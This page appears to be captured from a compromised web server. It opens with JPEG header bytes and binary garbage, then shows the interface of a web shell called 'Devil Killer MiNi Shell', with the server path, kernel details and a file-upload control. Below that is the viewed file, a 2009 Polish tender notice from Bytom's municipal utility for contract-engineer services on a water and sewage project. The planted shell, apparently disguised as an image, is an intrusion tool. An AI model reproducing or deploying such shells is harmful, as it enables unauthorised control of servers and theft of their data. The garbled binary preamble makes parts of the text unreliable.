JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/355628-N-2009.html

<p class="kh_header"><b>Bytom: Poprawa gospodarki wodno-ściekowej na terenie gminy Bytom (2004/PL/16/C/PE/004) Zadanie nr 11   Inżynier - kontynuacja</b><br>
<b>Numer ogłoszenia: 355628 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bytomskie Przedsiębiorstwo Komunalne Sp. z o.o. Jednostka Realizująca Projekt , Pl. Tadeusza Kościuszki 11, 41-902 Bytom, woj. śląskie, tel. 032 3967146, 3967143, 3967157, faks 032 3967156.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bpk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa gospodarki wodno-ściekowej na terenie gminy Bytom (2004/PL/16/C/PE/004) Zadanie nr 11   Inżynier - kontynuacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi pełnienie funkcji Inżyniera  dla kontynuacji realizacji projektu Poprawa gospodarki wodno-ściekowej na terenie Gminy Bytom   wraz z opracowaniem Raportu Końcowego dla Projektu Poprawa gospodarki wodno-ściekowej na terenie Gminy Bytom 2004-PL-16-C-PE-004. Inżynier będzie odpowiedzialny za kierowanie, nadzorowanie i administrowanie kontraktami na roboty oraz pomoc techniczną dla Zamawiającego. Usługi Inżyniera obejmują: -     kontynuację  usług Inżyniera w zakresie realizacji kontraktów na roboty, -     usługi w trakcie okresu zgłaszania wad,
-     opracowanie Raportu Końcowego Projektu. Inżynier będzie wykonywać swoje obowiązki w ścisłej współpracy z Zamawiającym, zgodnie z jego poleceniami i obowiązującymi przepisami. Działania Inżyniera polegać będą na:
a) w okresie przed rozpoczęciem nadzoru nad realizacją kontraktów:
- Weryfikacji wszystkich dokumentów wystawionych przez podmiot dotychczas pełniący funkcję Inżyniera, wniesienie ewentualnych korekt i wydaniu najpóźniej z dniem 31.12.2009r. oświadczenia o przejęciu pełnej odpowiedzialności za wszystkie dokumenty wystawione przez podmiot dotychczas pełniący funkcję Inżyniera, z wyłączeniem odpowiedzialności za dokumenty wadliwe, których Wykonawca nie mógł skorygować ze względu na zakończone postępowania administracyjne, w tym postępowania dotyczące udzielania zamówień publicznych.
- Zapoznaniu się z wszystkimi dokumentami kontraktowymi oraz pełną korespondencją dla kontraktów w fazie realizacji w terminie do 31.12.2009r oraz wydaniu oświadczenia o zapoznaniu się jw.
- Przejęciu i wdrożeniu wszystkich obowiązujących w ramach Projektu procedur zarządzania Kontraktami na roboty, wzorów dokumentów i ich archiwizacji; oraz wdrożenie dodatkowych (za zgodą Zamawiającego) w przypadku gdy Wykonawca uzna, że procedury takie przyczyniłyby się do podniesienia efektywności zarządzania kontraktami.
b) podczas realizacji kontraktów na roboty:	
- utrzymywaniu na bieżąco łączności i sprawozdawczości między wszystkimi uczestnikami Projektu;
- monitorowaniu i kontrolowaniu kontraktów na roboty pod względem technicznym, finansowym i organizacyjnym;
- informowaniu Zamawiającego o wszystkich problemach istniejących i przewidywanych razem ze sposobami ich rozwiązywania i/lub działaniu korygującym mającymi na celu usuwania takich problemów;
- współpracy z Zamawiającym w egzekwowaniu postanowień kontraktów na roboty; 
- nadzorze, kontroli i zapobieganiu, monitorowaniu i składaniu sprawozdań dotyczących między innymi rzeczowego i finansowego postępu robót ;
- współpracy z Zamawiającym w administrowaniu i finansowym zarządzaniu Projektem - dzień po dniu, włączając w to przygotowanie wskaźników postępu rzeczowego i finansowego, jaki jest niezbędny do raportowania ;
- kompleksowej obsłudze finansowej Projektu (zadania inwestycyjnego, za wyjątkiem obsługi procesu fakturowania) ;
- innych czynnościach i zadaniach nie wymienionych w niniejszym zakresie zadań, które okażą się konieczne dla prawidłowej realizacji kontraktu na roboty (zgodnie z wymaganiami Zamawiającego) oraz zabezpieczeniu interesów Zamawiającego.
c) podczas okresu zgłaszania wad:
Po skończeniu robót, podczas okresu zgłaszania wad, rola Inżyniera Kontraktu będzie polegała na uczestniczeniu w nadzorowaniu inspekcji gwarancyjnych, końcowych akceptacji i rozwiązywaniu  sporów. 
W szczególności, zadania te zawierają:
- ocenę ewentualnych roszczeń wzajemnych Zamawiającego i Wykonawcy ;
- ewidencję zgłaszanych wad i ich klasyfikację,
- regularne inspekcje wad usuwanych przez Wykonawcę;
- wydanie Świadectwa Wykonania i sprawdzenie Końcowego Oświadczenia Wykonawcy;
- płatność ostateczna : weryfikacje Ostatecznego Rozliczenia Wykonawców ; 
- zarekomendowanie zwrotu zabezpieczeń i kwoty zatrzymanej po terminie zgłaszania wad;
- udział Inżyniera Rezydenta podczas kontroli Instytucji Zarządzających.
Ponadto Wykonawca winien przygotować Raport Końcowy Projektu zgodnie z wymaganiami Komisji Europejskiej, wytycznymi krajowej instytucji zarządzającej Wytyczne do przygotowania raportu końcowego projektu Funduszu Spójności oraz zapisami Decyzji dla przedmiotowego Projektu.
Wartość szacunkowa zamówienia-   poniżej 412 000 EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.20.00-3, 71.31.80.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 20000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Sytuacja podmiotowa wykonawców , informacje i formalności konieczne do dokonania oceny spełniania wymogów: 
Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:  posiadać uprawnienia do wykonywania działalności lub czynności oraz nie podlegać wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29.01.2004r. (Dz.U. z 2007r. Nr 223 poz. 1655 oraz z 2008r. Nr 171 poz.1058). 
W W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:                 1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty  dla każdego z nich),     
b) 2) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  ZUS lub KRUS  potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne  i społeczne, lub zaświadczenia , że uzyskał przewidziane prawem zwolnienie , odroczone i rozłożone na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty  dla każdego z  nich),                                                                                                                                                                                                                    3) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.4-8 u.p.z.p., wystawiona nie wcześniej niż 6miesięcy przed upływem terminu składania ofert. (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty  dla każdego z nich),
4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty  dla każdego z nich),   W przypadku gdy Wykonawca nie jest zakwalifikowany jako podmiot zbiorowy, informacje o tym zamieszcza w ofercie;                                                                 
5) złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia ww. dokument może być złożony:                                                          - przez każdego z Wykonawców składających ofertę wspólną, jedynie w  sytuacji jeżeli każdy z nich spełnia wszystkie warunki samodzielnie,                                                                                                                                                                     - albo wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez pełnomocnika albo przez upoważnionych przedstawicieli każdego z Wykonawców składających ofertę wspólną. 
6) Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane:                                                                                                                                                                                                                                     -jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1),  2)  i  4)  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:                                                                                                                                                                                                           6a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;                                                                                                                                          6b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;                                                                                                                                                                              6c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;6d) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 3)  składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 6)  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.    Dokumenty i oświadczenia , o których mowa w tym punkcie winny być wystawione w terminach analogicznych do odpowiadających im dokumentów wymienionych w pkt. 1) do 4).

2) Zdolność ekonomiczna i finansowa:

Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  niniejszego zamówienia . W szczególności Wykonawca musi spełniać następujące warunki  W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa -  w tym celu dokumenty o których mowa poniżej ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku. 
a) Wykonawca osiągnął łącznie przychód netto ze sprzedaży  produktów , towarów i materiałów z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, nie mniejszy niż   10 000 000 PLN.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,  
b)	posiadać środki finansowe lub posiadać zdolność kredytową w wysokości co najmniej  400 000 PLN.                                                                                                                                  
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzające posiadanie środków finansowych 
w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej  wysokości,  
c) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej  5 000 000 PLN. W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy musza złożyć polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
W celu przeliczenia na PLN wartości i danych finansowych podanych w innych walutach, należy zastosować średni kurs NBP z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
3) Zdolność techniczna:
Posiadać niezbędną wiedzę i doświadczenie oraz dysponować  potencjałem    technicznym  i osobami  zdolnymi do wykonania niniejszego zamówienia. W przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie -  w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnianie tego warunku.

1. Wskazać do wykonania niniejszego zamówienia następujące osoby, stanowiące skład podstawowy tzw. Ekspertów kluczowych wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich  czynności:

1)	Lider Zespołu - odpowiedzialny za zagadnienia kontraktowe posiadający:
- wyższe wykształcenie w jednym z następujących kierunków: inżynieryjny, ekonomiczny lub zarządzania,
- co najmniej 10-letnie doświadczenie zawodowe w tym 5-letnie doświadczenie              
      w pełnieniu stanowiska kierowniczego ,
- doświadczenie w kierowaniu kontraktem realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 3 projektach z zakresu ochrony środowiska o wartości robót co najmniej 
50 mln. PLN każdy lub jednym o wartości 100 mln. PLN.
- doświadczenie zawodowe należy wykazać w życiorysie.
2)	 Inżynier Rezydent - odpowiedzialny za zagadnienia realizacyjne i techniczne posiadający:		                                                            
- wyższe wykształcenie techniczne,
- co najmniej 10-letnie doświadczenie zawodowe w zarządzaniu gosp. wodno-ściekową lub/i oczyszczaniu ścieków, 
- doświadczenie w kierowaniu kontraktem realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN. Doświadczenie zawodowe należy wykazać w życiorysie, 
- aktualne, ważne zaświadczenie o przynależności do Izby Inżynierów Budownictwa,
- pełna dyspozycyjność, zaangażowanie Inżyniera Rezydenta przy realizacji niniejszego zamówienia w wymiarze pełnego etatu, wykonywane na miejscu, w biurze prowadzonym na terenie Miasta Bytomia.
3) Inżynier/ technik w specjalności instalacje i sieci wod-kan posiadający:
- co najmniej 10-letnie doświadczenie w nadzorowaniu robót lub kierowaniu robotami przy budowie sieci wodociągowo-kanalizacyjnej a także w zakresie nadzoru nad budową lub modernizacją oczyszczalni ścieków,
- doświadczenie w kierowaniu/nadzorowaniu kontraktem realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN. z zakresu ochrony środowiska. Doświadczenie zawodowe należy wykazać w życiorysie.
- uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie sieci sanitarnych obejmujących sieci wodociągowe, kanalizacyjne, gazowe i cieplne lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
- aktualne, ważne zaświadczenie o przynależności do Izby Inżynierów Budownictwa, 
- pełna dyspozycyjność.
4) Inżynier /technik w specjalności drogowej posiadający:
- co najmniej 5-letnie doświadczenie w pełnieniu funkcji inspektora nadzoru przy budowie dróg,
- doświadczenie w kierowaniu/nadzorowaniu kontraktem realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN. Doświadczenie zawodowe należy wykazać w życiorysie. 
- uprawnienia budowlane do kierowania robotami w specjalności  drogowej lub odpowiadające  im ważne uprawnienia budowlane , które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami drogowymi,
- aktualne, ważne zaświadczenie o przynależności do Izby Inżynierów Budownictwa, 
- pełna dyspozycyjność.
5)   Inżynier/ technik w specjalności konstrukcyjno-budowlanej posiadający:
- co najmniej 5-letnie doświadczenie w pełnieniu funkcji inspektora nadzoru przy robotach konstrukcyjno-budowlanych,
- doświadczenie w kierowaniu/nadzorowaniu kontraktem realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN. Doświadczenie zawodowe należy wykazać w życiorysie.
- uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- aktualne, ważne zaświadczenie o przynależności do Izby Inżynierów Budownictwa,
     - pełna dyspozycyjność.
6)  Inżynier w specjalności instalacyjnej w zakresie sieci i instalacji  elektrycznych i automatyki posiadający:
- co najmniej 5-letnie doświadczenie zawodowe  w nadzorowaniu robót elektrycznych i aparatury kontrolno-pomiarowej i automatyki (AKPiA) lub kierowaniu robotami elektrycznymi i aparatury kontrolno-pomiarowej i automatyki (AKPiA),  
- doświadczenie w kierowaniu/nadzorowaniu kontraktami realizowanym według Warunków Kontraktu FIDIC (Czerwona Książka) lub procedur równoważnych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN. Doświadczenie zawodowe należy wykazać w życiorysie,
- posiadać uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami elektrycznymi, 
- aktualne, ważne zaświadczenie o przynależności do Izby Inżynierów Budownictwa,
- pełna dyspozycyjność.
7)	Specjalista ds. finansowych posiadający:
- co najmniej 2 lata pracy w zespole Inżyniera na stanowisku związanym z rozliczaniem robót budowlano-montażowych przy minimum 1 projekcie o wartości co najmniej 50 mln. PLN.  realizowanym według Warunków Kontraktu FIDIC (Czerwona książka) lub procedur równoważnych. Doświadczenie zawodowe należy wykazać w życiorysie.
8)	Kontroler finansowy (kosztorysant) posiadający:
- co najmniej 5-letnie doświadczenie jako kosztorysant,
- znajomość Warunków Kontraktu FIDIC lub procedur równoważnych i  co najmniej roczne doświadczenie w ich stosowaniu,
- pełny etat.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: 
- wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, które będą uczestniczyć w wykonywaniu niniejszego zamówienia, sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ;
- pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie j.w. wykonawca wskazał osoby, którymi będzie dysponował,
- życiorysy osób proponowanych dla każdego z ww. stanowisk sporządzone wg wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ. Życiorysy powinny zostać przedstawione maksymalnie na 3 stronach.
- dokumenty stwierdzające, że Inżynier Rezydent, Inżynier w specjalności wod-kan, Inżynier w specjalności drogowej, Inżynier w specjalności konstrukcyjno - budowlanej, Inżynier w specjalności instalacji elektrycznych i automatyki,  posiadają wymagane uprawnienia zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (tj. z 2006r. Dz. U. nr 156, poz. 1118 z późniejszymi zmianami) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. Nr 83 poz. 578 z późniejszymi zmianami) lub, jeżeli zostały wydane przed wejściem w życie w/w ustawy Prawo Budowlane, powinny to być uprawnienia równoważne, w zakresie dotyczącym przedmiotu zamówienia, zgodne z obowiązującym na dzień wydania prawem, wystawione przed upływem terminu składania ofert, tzn.: kopie decyzji o przyznaniu uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie oraz kopie aktualnego zaświadczenia o przynależności ww. osoby do właściwej Izby samorządu zawodowego.

2)   Wykazać, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawcy wykonali:
- co najmniej 1 usługę w pełnienie funkcji Inżyniera dla zadań podobnych (odpowiadających swoim rodzajem i wartością)  o wartości nadzorowanych robót 100 mln. PLN; 
- co najmniej 1 opracowanie Raportu Końcowego o wartości realizowanego Projektu   120 mln. PLN.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć:- wykaz wykonanych zamówień w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia, z podaniem daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 5 do SIWZ,
- dokumenty potwierdzające, że usługi wymienione w załączniku nr 5 do SIWZ zostały wykonane należycie;
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały wykonane należycie zawierały, co najmniej:
a) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty których dokumenty dotyczą,
b) wskazanie podmiotu, na rzecz którego realizowane były roboty,
c) wskazanie zakresu robót,
d) wskazanie daty wykonania (rozpoczęcia i zakończenia),
e) opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że roboty zostały wykonane należycie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> jak wyżej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
